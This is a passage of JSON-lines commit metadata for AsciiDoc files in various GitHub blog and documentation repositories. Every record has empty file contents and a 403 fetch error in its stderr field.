2015-06-25-GIT.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-06-25-GIT.adoc","new_file":"_posts\/2015-06-25-GIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c067a2f5a20c958f9e57ebb0a7250c43324af4ca","subject":"Create deleteme.adoc","message":"Create deleteme.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/fotos\/deleteme.adoc","new_file":"_posts\/fotos\/deleteme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3236114da9bc19a39e03a03b78a273de1caea93","subject":"Ex interf","message":"Ex interf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f468d575169f552dbc24e46d604fe4c9c8a6d37","subject":"Asciidoc lists","message":"Asciidoc lists\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abdec93e2e90c16ec380ff73a81db6ded533ed77","subject":"Move install Google Cloud SDK to common snipppets","message":"Move install Google Cloud SDK to common snipppets\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installgooglecloudsdk.adoc","new_file":"src\/main\/docs\/common-installgooglecloudsdk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11d316a5752e5662af1c3231c8348dbcad28f1f4","subject":"y2b create post Tritton AX Pro Headset Unboxing \\u0026 Overview","message":"y2b create post Tritton AX Pro Headset Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-17-Tritton-AX-Pro-Headset-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-17-Tritton-AX-Pro-Headset-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2fc01efdf4af01b34afc17935dbff7c54d00480","subject":"[DOC] Correct package import mistake","message":"[DOC] Correct package import mistake\n\nfix #678\n","repos":"takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f03555785d8ca9ae746c12c6763409afcea5c7e5","subject":"Publish 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Publish 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af0f7063d18c090dc5435d9058e21a56a600d7e8","subject":"Write a proper manual page","message":"Write a proper manual page\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"4d6bb429e23293ac80999e2c2cd1876fd3a24a93","subject":"Update 2015-08-26-What-Matters-Revisited.adoc","message":"Update 2015-08-26-What-Matters-Revisited.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-26-What-Matters-Revisited.adoc","new_file":"_posts\/2015-08-26-What-Matters-Revisited.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c4c85856c65b3873eaa92ddf12a9f41cc8d962","subject":"Update 2017-06-07-Podcast-Dues-Dues-Dues.adoc","message":"Update 2017-06-07-Podcast-Dues-Dues-Dues.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-07-Podcast-Dues-Dues-Dues.adoc","new_file":"_posts\/2017-06-07-Podcast-Dues-Dues-Dues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5736202268af63b30216cb5fd352626a77eba7a","subject":"Update 2015-12-02-Test.adoc","message":"Update 2015-12-02-Test.adoc","repos":"adamperer\/diary,adamperer\/diary,adamperer\/diary","old_file":"_posts\/2015-12-02-Test.adoc","new_file":"_posts\/2015-12-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adamperer\/diary.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"760601cdbde7c69a520b6a262e3b0d5739b91178","subject":"Update 2016-12-02-test.adoc","message":"Update 2016-12-02-test.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"_posts\/2016-12-02-test.adoc","new_file":"_posts\/2016-12-02-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d778c427633cee87ff7b2e4cb41995717428bfb9","subject":"y2b create post New Oversized Productivity Monitor by LG - CES 2013","message":"y2b create post New Oversized Productivity Monitor by LG - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-New-Oversized-Productivity-Monitor-by-LG--CES-2013.adoc","new_file":"_posts\/2013-01-10-New-Oversized-Productivity-Monitor-by-LG--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3927922b7c169b1bf973e7272832bed42e5d892","subject":"add note about support C* versions","message":"add note about support C* versions\n","repos":"objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b318ed09897de505dc311f415ed2270167c39143","subject":"Added first skeleton of AS2 component docs","message":"Added first skeleton of AS2 component docs\n","repos":"DariusX\/camel,pax95\/camel,dmvolod\/camel,pmoerenhout\/camel,tadayosi\/camel,anoordover\/camel,tdiesler\/camel,dmvolod\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,objectiser\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,sverkera\/camel,cunningt\/camel,Fabryprog\/camel,mcollovati\/camel,CodeSmell\/camel,christophd\/camel,onders86\/camel,dmvolod\/camel,onders86\/camel,sverkera\/camel,christophd\/camel,CodeSmell\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jamesnetherton\/camel,cunningt\/camel,akhettar\/camel,dmvolod\/camel,Fabryprog\/camel,sverkera\/camel,dmvolod\/camel,apache\/camel,gnodet\/camel,kevinearls\/camel,christophd\/camel,pax95\/camel,akhettar\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,gnodet\/camel,CodeSmell\/camel,pax95\/camel,tdiesler\/camel,ullgren\/camel,adessaigne\/camel,sverkera\/camel,jamesnetherton\/camel,apache\/camel,tdiesler\/camel,dmvolod\/camel,akhettar\/camel,Fabryprog\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,onders86\/camel,gnodet\/camel,ullgren\/camel,mcollovati\/camel,jamesnetherton\/camel,davidkarlsen\/camel,akhettar\/camel,objectiser\/camel,nicolaferraro\/camel,alvinkwekel\/camel,mcollovati\/camel,Fabryprog\/camel,zregvart\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,anoordover\/camel,apache\/camel,alvinkwekel\/camel,ullgren\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,adessaigne\/camel,apache\/camel,objectiser\/camel,davidkarlsen\/camel,anoordover\/camel,onders86\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,davidkarlsen\/camel,objectiser\/camel,pax95\/camel,sverkera\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,CodeSmell\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,anoordover\/camel,adessaigne\/camel,christophd\/camel,anoordover\/camel,jamesnetherton\/camel,alvinkwekel\/camel,tdiesler\/camel,adessaigne\/camel,sverkera\/camel,akhettar\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,kevinearls\/camel,DariusX\/camel,onders86\/camel,nicolaferraro\/camel,apache\/camel,kevinearls\/camel,adessaigne\/camel,mcollovati\/camel,anoordover\/camel,gnodet\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,tadayosi\/camel,tadayosi\/camel,kevinearls\/camel,akhettar\/camel,pax95\/camel,pmoerenhout\/camel,zregvart\/camel","old_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c42df6874116444cedb8d943ce45ccebca4d2f1","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27bba3b9858d82f6cedd29a20bb1f948c0b63265","subject":"Update 2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","message":"Update 2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","repos":"booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io","old_file":"_posts\/2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","new_file":"_posts\/2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/booleanbalaji\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ffd3d3f3397762f3af40dc31e8ef2783e4d720c","subject":"DOC initial version","message":"DOC initial version\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/build-great-native-cli-apps-in-java-with-graalvm-and-picocli.adoc","new_file":"docs\/build-great-native-cli-apps-in-java-with-graalvm-and-picocli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb2057d50912e815b63f56582a5705e326db1d08","subject":"Worked on fsevents disk log format documentation","message":"Worked on fsevents disk log format documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17b29cf37284860706c4a262162a99287d772d61","subject":"Update 2015-06-03-PubPress-first-impression.adoc","message":"Update 2015-06-03-PubPress-first-impression.adoc","repos":"vvani06\/hubpress-test,vvani06\/hubpress-test,vvani06\/hubpress-test","old_file":"_posts\/2015-06-03-PubPress-first-impression.adoc","new_file":"_posts\/2015-06-03-PubPress-first-impression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vvani06\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6646d815d996afa0187d38a00ca8684a414102","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a2e31d93b4af3c98342632f7086e94020342104","subject":"create post 3 Cool Gadgets Under $80","message":"create post 3 Cool Gadgets Under $80","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25f0660fd1f0557cde7c558fe2ddf6d424e18c0","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5637797444fb4a37759f81c4af75f4d7ace0d35c","subject":"BVAL-502 Add the master asciidoc file to the repository already, hardcoding expected file names","message":"BVAL-502 Add the master asciidoc file to the repository already, hardcoding expected file names\n","repos":"beanvalidation\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/master.asciidoc","new_file":"sources\/master.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7437f9413e85f239fe9d715209d5259a1e3946a4","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6889473bf87194684340d11d99c9260c7c78387","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-The-Most-Requested-Smartphone-Ive-NEVER-Featured.adoc","new_file":"_posts\/2017-12-24-The-Most-Requested-Smartphone-Ive-NEVER-Featured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73684dbd033770d32e571af0c12a06d07f78aa10","subject":"Stats corr","message":"Stats corr\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice.adoc","new_file":"Dev tools\/Exercice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b275f2d30c3cbe11319333a5de6cab0e3b1eb6f8","subject":"Check warns","message":"Check warns\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Eclipse.adoc","new_file":"Best practices\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe56d96295b18192c358e0822cc529778f632fee","subject":"Fixes #1429","message":"Fixes #1429\n","repos":"joshiste\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c11bd8cc9034f385ee63d50a48a6e922f94bfde","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2f090f2b9b429d915f65d9517f25aa83127a49a","subject":"Update 2017-05-08-Kritik-oder-Spiel.adoc","message":"Update 2017-05-08-Kritik-oder-Spiel.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-08-Kritik-oder-Spiel.adoc","new_file":"_posts\/2017-05-08-Kritik-oder-Spiel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"373879e255c1bc85c18676a9ee62ce32b37721ed","subject":"Update 2016-05-31-Rinna-In-Pepper.adoc","message":"Update 2016-05-31-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0086f27565b06f0a102b4c2966c26958f69c53","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8487a9202448b139da074a59195370470d0708b2","subject":"Update 2015-04-02-Test.adoc","message":"Update 2015-04-02-Test.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-Test.adoc","new_file":"_posts\/2015-04-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6bd6361dbcbfeb723e328bcbe310e7aac07a248","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba49e2d8161483a74d12e03c3a6f1e17911888ac","subject":"Update 2017-07-30-Carpets.adoc","message":"Update 2017-07-30-Carpets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-07-30-Carpets.adoc","new_file":"_posts\/2017-07-30-Carpets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4c381ded6f7a797cec246af77953bb357bdee99","subject":"Added current week04 notes... not ready for student view","message":"Added current week04 notes... not ready for student view\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b1cdc89bc0be8f4848b82a4df918757f060940e","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52c7de439b40763ae33f6996d46dbb04f6797b5b","subject":"Update 2016-02-06-Learning-resources-part-01.adoc","message":"Update 2016-02-06-Learning-resources-part-01.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources-part-01.adoc","new_file":"_posts\/2016-02-06-Learning-resources-part-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 